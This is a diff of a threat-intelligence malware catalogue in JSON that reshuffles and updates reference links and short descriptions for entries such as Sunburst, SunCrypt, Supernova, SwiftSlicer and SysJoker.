- "https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947",
- "https://twitter.com/FireEye/status/1339295983583244302",
- "https://www.comae.com/posts/sunburst-memory-analysis/",
- "https://labs.sentinelone.com/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/",
- "https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/",
- "https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/center-for-threat-informed-defense/public-resources/master/solorigate/UNC2452.json",
- "https://community.riskiq.com/article/9a515637",
- "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/",
- "https://github.com/fireeye/sunburst_countermeasures",
- "https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/",
- "https://www.solarwinds.com/securityadvisory",
- "https://www.nato.int/cps/en/natolive/official_texts_183168.htm?selectedLocale=en",
- "https://www.consilium.europa.eu/en/press/press-releases/2021/04/15/declaration-by-the-high-representative-on-behalf-of-the-european-union-expressing-solidarity-with-the-united-states-on-the-impact-of-the-solarwinds-cyber-operation",
- "https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar",
- "https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf",
- "https://netresec.com/?b=212a6ad",
- "https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a",
- "https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html",
- "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline",
- "https://www.brighttalk.com/webcast/7451/469525",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds",
"https://netresec.com/?b=2113a6a",
- "https://us-cert.cisa.gov/sites/default/files/publications/SolarWinds_and_AD-M365_Compromise-Detecting_APT_Activity_from_Known_TTPs.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data",
- "https://www.domaintools.com/resources/blog/unraveling-network-infrastructure-linked-to-the-solarwinds-hack",
- "https://us-cert.cisa.gov/remediating-apt-compromised-networks",
- "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-077a",
- "https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc",
- "https://www.cisa.gov/supply-chain-compromise",
- "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-352a",
- "https://twitter.com/KimZetter/status/1338305089597964290",
- "https://netresec.com/?b=211cd21",
- "https://github.com/fireeye/Mandiant-Azure-AD-Investigator",
- "https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/",
- "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718",
- "https://youtu.be/SW8kVkwDOrc?t=24706",
- "https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth",
- "https://www.brighttalk.com/webcast/7451/462719",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-command-control",
- "https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a",
- "https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/",
- "https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000173994221000076/swi-20210507.htm",
- "https://blog.cloudflare.com/solarwinds-orion-compromise-trend-data/",
- "https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html",
- "https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/",
- "https://www.securonix.com/web/wp-content/uploads/2020/12/threat_research_solarwinds_sunburst_eclipser_supply_chain.pdf",
- "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
- "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware",
- "https://news.sophos.com/en-us/2020/12/14/solarwinds-playbook/",
- "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
- "https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software",
- "https://www.4hou.com/posts/KzZR",
- "https://www.ironnet.com/blog/solarwinds/sunburst-behavioral-analytics-and-collective-defense-in-action",
- "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714",
- "https://www.gov.pl/web/diplomacy/statement-on-solar-winds-orion-cyberattacks",
- "https://github.com/cisagov/CHIRP",
- "https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response",
- "https://zengo.com/ungilded-secrets-a-new-paradigm-for-key-security/",
- "https://www.bleepingcomputer.com/news/security/fireeye-microsoft-create-kill-switch-for-solarwinds-backdoor/",
- "https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf",
- "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/",
- "https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/",
- "https://www.cadosecurity.com/post/responding-to-solarigate",
- "https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection",
- "https://www.mfa.gov.lv/en/news/latest-news/67813-latvia-s-statement-following-the-announcement-by-the-united-states-of-actions-to-respond-to-the-russian-federation-s-destabilizing-activities",
- "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
- "https://blog.gigamon.com/2021/07/27/ghosts-on-the-wire-expanding-conceptions-of-network-anomalies/",
- "https://www.fireeye.com/current-threats/sunburst-malware.html",
+ "https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html",
"https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
- "https://www.youtube.com/watch?v=LA-XE5Jy2kU",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update",
- "https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q",
- "https://www.cyborgsecurity.com/cyborg_labs/threat-hunt-deep-dives-solarwinds-supply-chain-compromise-solorigate-sunburst-backdoor/",
+ "https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html",
+ "https://www.securonix.com/web/wp-content/uploads/2020/12/threat_research_solarwinds_sunburst_eclipser_supply_chain.pdf",
+ "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/",
+ "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more",
+ "https://github.com/cisagov/CHIRP",
+ "https://www.nato.int/cps/en/natolive/official_texts_183168.htm?selectedLocale=en",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-attacks-stealthy-attackers-attempted-evade-detection",
+ "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-077a",
+ "https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software",
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:MSIL/Solorigate.B!dha",
+ "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/",
+ "https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug",
+ "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-352a",
+ "https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/",
+ "https://www.youtube.com/watch?v=JoMwrkijTZ8",
+ "https://netresec.com/?b=212a6ad",
+ "https://www.youtube.com/watch?v=-Vsgmw2G4Wo",
+ "https://github.com/sophos-cybersecurity/solarwinds-threathunt",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a",
+ "https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/",
+ "https://twitter.com/0xrb/status/1339199268146442241",
+ "https://www.solarwinds.com/securityadvisory/faq",
+ "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
+ "https://us-cert.cisa.gov/sites/default/files/publications/SolarWinds_and_AD-M365_Compromise-Detecting_APT_Activity_from_Known_TTPs.pdf",
+ "https://www.microsoft.com/security/blog/2021/02/25/microsoft-open-sources-codeql-queries-used-to-hunt-for-solorigate-activity/",
+ "https://github.com/fireeye/sunburst_countermeasures",
+ "https://www.mimecast.com/blog/important-security-update/",
"https://twitter.com/lordx64/status/1338526166051934213",
- "https://www.youtube.com/watch?v=mbGN1xqy1jY"
+ "https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar",
+ "https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html",
+ "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html",
+ "https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack",
+ "https://pastebin.com/6EDgCKxd",
+ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
+ "https://www.youtube.com/watch?v=LA-XE5Jy2kU",
+ "https://www.youtube.com/watch?v=cMauHTV-lJg",
+ "https://youtu.be/Ta_vatZ24Cs?t=59",
+ "https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/center-for-threat-informed-defense/public-resources/master/solorigate/UNC2452.json",
+ "https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response",
+ "https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095",
+ "https://www.cisa.gov/supply-chain-compromise",
+ "https://www.ironnet.com/blog/solarwinds/sunburst-behavioral-analytics-and-collective-defense-in-action",
+ "https://twitter.com/Intel471Inc/status/1339233255741120513",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
+ "https://www.elastic.co/blog/supervised-and-unsupervised-machine-learning-for-dga-detection",
+ "https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.solarwinds.com/securityadvisory",
+ "https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/",
+ "https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-unique-dga",
+ "https://www.bleepingcomputer.com/news/security/autodesk-reveals-it-was-targeted-by-russian-solarwinds-hackers/",
+ "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
+ "https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards",
+ "https://twitter.com/FireEye/status/1339295983583244302",
+ "https://twitter.com/cybercdh/status/1339241246024404994",
+ "https://thenewstack.io/behind-the-scenes-of-the-sunburst-attack/",
+ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware",
+ "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach",
+ "https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst",
+ "https://unit42.paloaltonetworks.com/atoms/solarphoenix/",
+ "https://securelist.com/sunburst-backdoor-kazuar/99981/",
+ "https://www.domaintools.com/resources/blog/unraveling-network-infrastructure-linked-to-the-solarwinds-hack"
],
"synonyms": [
"Solorigate"
@@ -43714,29 +46086,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
- "https://medium.com/s2wlab/case-analysis-of-suncrypt-ransomware-negotiation-and-bitcoin-transaction-43a2194ac0bc",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://medium.com/@sapphirex00/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83",
- "https://pcsxcetrasupport3.wordpress.com/2021/03/28/suncrypt-powershell-obfuscation-shellcode-and-more-yara/",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt",
- "https://blog.minerva-labs.com/suncrypt-ransomware-gains-new-abilities-in-2022",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/",
- "https://www.tesorion.nl/en/posts/shining-a-light-on-suncrypts-curious-file-encryption-mechanism/",
- "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-is-still-alive-and-kicking-in-2022/",
- "https://cdn.pathfactory.com/assets/10555/contents/394789/0dd521f8-aa64-4517-834e-bc852e9ab95d.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
- "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
+ "https://www.tesorion.nl/en/posts/shining-a-light-on-suncrypts-curious-file-encryption-mechanism/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
"https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
- "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel"
+ "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://medium.com/@sapphirex00/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-is-still-alive-and-kicking-in-2022/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://cdn.pathfactory.com/assets/10555/contents/394789/0dd521f8-aa64-4517-834e-bc852e9ab95d.pdf",
+ "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://pcsxcetrasupport3.wordpress.com/2021/03/28/suncrypt-powershell-obfuscation-shellcode-and-more-yara/",
+ "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/",
+ "https://medium.com/s2wlab/case-analysis-of-suncrypt-ransomware-negotiation-and-bitcoin-transaction-43a2194ac0bc",
+ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
+ "https://blog.minerva-labs.com/suncrypt-ransomware-gains-new-abilities-in-2022"
],
"synonyms": [],
"type": []
@@ -43755,15 +46127,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "80365d3a-6d46-4195-a772-364749a6dc06",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4",
"value": "SunOrcal"
},
@@ -43778,15 +46141,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "54c03b3c-6f97-46ea-a93f-f07bfd5cdd36",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a89f7e01-b049-4d09-aca3-ce19d91c4544",
"value": "SunSeed"
},
@@ -43795,29 +46149,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.supernova",
- "https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group",
"https://www.youtube.com/watch?v=7WX5fCEzTlA",
- "https://unit42.paloaltonetworks.com/solarstorm-supernova",
- "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
"https://twitter.com/MalwareRE/status/1342888881373503488",
- "https://unit42.paloaltonetworks.com/solarstorm-supernova/",
- "https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html",
- "https://github.com/fireeye/sunburst_countermeasures",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a",
- "https://www.solarwinds.com/securityadvisory",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a",
- "https://www.splunk.com/en_us/blog/security/supernova-redux-with-a-generous-portion-of-masquerading.html",
- "https://www.anquanke.com/post/id/226029",
- "https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis",
- "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/",
- "https://www.solarwinds.com/securityadvisory/faq",
- "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
- "https://www.sentinelone.com/labs/solarwinds-understanding-detecting-the-supernova-webshell-trojan",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
- "https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html",
"https://github.com/fireeye/sunburst_countermeasures/pull/5",
+ "https://www.solarwinds.com/securityadvisory/faq",
+ "https://github.com/fireeye/sunburst_countermeasures",
+ "https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a",
+ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
+ "https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/",
+ "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a",
+ "https://unit42.paloaltonetworks.com/solarstorm-supernova",
+ "https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html",
+ "https://www.splunk.com/en_us/blog/security/supernova-redux-with-a-generous-portion-of-masquerading.html",
+ "https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
+ "https://unit42.paloaltonetworks.com/solarstorm-supernova/",
+ "https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html",
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/"
+ "https://www.sentinelone.com/labs/solarwinds-understanding-detecting-the-supernova-webshell-trojan",
+ "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
+ "https://www.anquanke.com/post/id/226029",
+ "https://www.solarwinds.com/securityadvisory"
],
"synonyms": [],
"type": []
@@ -43830,11 +46184,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox",
- "https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf",
- "https://www.justice.gov/opa/pr/two-romanian-cybercriminals-convicted-all-21-counts-relating-infecting-over-400000-victim",
"https://www.symantec.com/connect/blogs/trojanbayrob-strikes-again-1",
+ "https://www.justice.gov/opa/pr/two-romanian-cybercriminals-convicted-all-21-counts-relating-infecting-over-400000-victim",
"https://www.symantec.com/connect/blogs/bayrob-three-suspects-extradited-face-charges-us",
- "https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf"
+ "https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf",
+ "https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf"
],
"synonyms": [
"Bayrob",
@@ -43855,15 +46209,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "dd919e75-57e8-4e5c-9451-8be6e734f1f3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8666afcc-8cc2-4856-83de-b7e8b4309367",
"value": "surtr"
},
@@ -43872,8 +46217,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.svcready",
- "https://www.socinvestigation.com/new-svcready-malware-loads-from-word-doc-properties-detection-response/",
- "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/"
+ "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/",
+ "https://www.socinvestigation.com/new-svcready-malware-loads-from-word-doc-properties-detection-response/"
],
"synonyms": [],
"type": []
@@ -43894,6 +46239,23 @@
"uuid": "63657a3b-1f8f-422d-80de-fe4644f5d7ba",
"value": "swen"
},
+ {
+ "description": "According to ESET, this is a wiper written in Go, that was deployed against an Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victim’s Active Directory environment.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.swiftslicer",
+ "https://www.welivesecurity.com/2023/01/27/swiftslicer-new-destructive-wiper-malware-ukraine/",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://twitter.com/ESETresearch/status/1618960022150729728"
+ ],
+ "synonyms": [
+ "JaguarBlade"
+ ],
+ "type": []
+ },
+ "uuid": "dba43d45-053f-4225-b813-ff7727b2b7d2",
+ "value": "SwiftSlicer"
+ },
{
"description": "",
"meta": {
@@ -43904,15 +46266,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "96fb29fa-7c3a-4124-baf5-cc5f99b2a05f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295",
"value": "Sword"
},
@@ -43921,13 +46274,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot",
+ "https://www.symantec.com/connect/blogs/sykipot-attacks",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
"https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-edison",
"https://www.alienvault.com/blogs/labs-research/sykipot-is-back",
"https://community.rsa.com/thread/185437",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/",
- "https://www.secureworks.com/research/threat-profiles/bronze-edison",
- "https://www.symantec.com/connect/blogs/sykipot-attacks"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/"
],
"synonyms": [
"Wkysol",
@@ -43943,8 +46296,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.synack",
- "https://therecord.media/synack-ransomware-gang-releases-decryption-keys-for-old-victims/",
- "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/"
+ "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/",
+ "https://therecord.media/synack-ransomware-gang-releases-decryption-keys-for-old-victims/"
],
"synonyms": [],
"type": []
@@ -43995,9 +46348,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf"
+ "https://securelist.com/analysis/publications/69953/the-naikon-apt/"
],
"synonyms": [],
"type": []
@@ -44010,9 +46363,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/",
"https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
- "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/"
+ "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/"
],
"synonyms": [],
"type": []
@@ -44035,13 +46388,13 @@
"value": "SysGet"
},
{
- "description": "",
+ "description": "Sysjoker is a backdoor malware that was first discovered in December 2021 by Intezer. It is sophisticated and written from scratch in C++. Sysjoker is a cross-platform malware that has Linux, Windows, and macOS variants. Possible attack vectors for Sysjoker are email attachments, malicious advertisements, and trojanized software.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sysjoker",
+ "https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html",
"https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/",
- "https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/",
- "https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html"
+ "https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/"
],
"synonyms": [],
"type": []
@@ -44055,8 +46408,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.syskit",
"https://twitter.com/QW5kcmV3/status/1176861114535165952",
- "https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897",
"https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media",
+ "https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897",
"https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/",
"https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain",
"https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html"
@@ -44117,25 +46470,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc",
